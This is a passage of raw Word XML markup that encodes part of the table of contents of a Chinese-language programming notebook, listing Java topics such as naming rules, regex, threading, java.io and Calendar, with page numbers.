              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06315009" w14:textId="1A415D4D" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780145" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>创建应用</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780145 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>743</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CD82B22" w14:textId="3F9B5B5A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780146" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Java</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780146 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>744</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7BFB843A" w14:textId="19D82942" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780147" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Base</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780147 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>744</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7B0C8CD8" w14:textId="5F1284FA" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780148" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>java</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>特性常识</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780148 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>744</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B842A57" w14:textId="539E9E9A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780149" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>内置方法</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780149 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>791</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0859066E" w14:textId="6C6BC9CD" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780150" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>命名规则</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780150 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>792</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A584DA0" w14:textId="79E77923" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780151" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>文档注释</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780151 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>792</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08A6DEA7" w14:textId="2738826A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780152" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>JavaBean</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780152 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>792</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04B852E3" w14:textId="36242935" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780153" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Java</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>版本命名问题</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780153 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>793</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2E507401" w14:textId="398CF401" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780154" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>内置包和第三方包</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780154 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>794</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5F7F2447" w14:textId="78433649" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780155" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>java.util.regex</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：正则表达式</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780155 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>794</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2B9F906F" w14:textId="19EC7DAB" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780156" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Thread.sleep:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>线程休眠</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780156 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>800</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2374C798" w14:textId="302280FC" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780157" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ExecutorService</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>多线程</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780157 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>800</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5219E0D1" w14:textId="5784D865" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780158" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>system:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>系统类</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780158 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>801</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="45D2A085" w14:textId="5E278F97" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780159" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>System.currentTimeMillis:</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>测量程序运行时间：单位毫秒</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780159 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>801</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C64EC0D" w14:textId="35404E48" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780160" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>java.io</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：处理所有输入输出</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780160 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>802</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="06C0917B" w14:textId="520C7D3C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780161" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>java.util.Arrays.Data</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>：日期和时间</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159780161 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>807</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2499DE99" w14:textId="467D3D7A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159780162" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Calendar</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>类：比</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
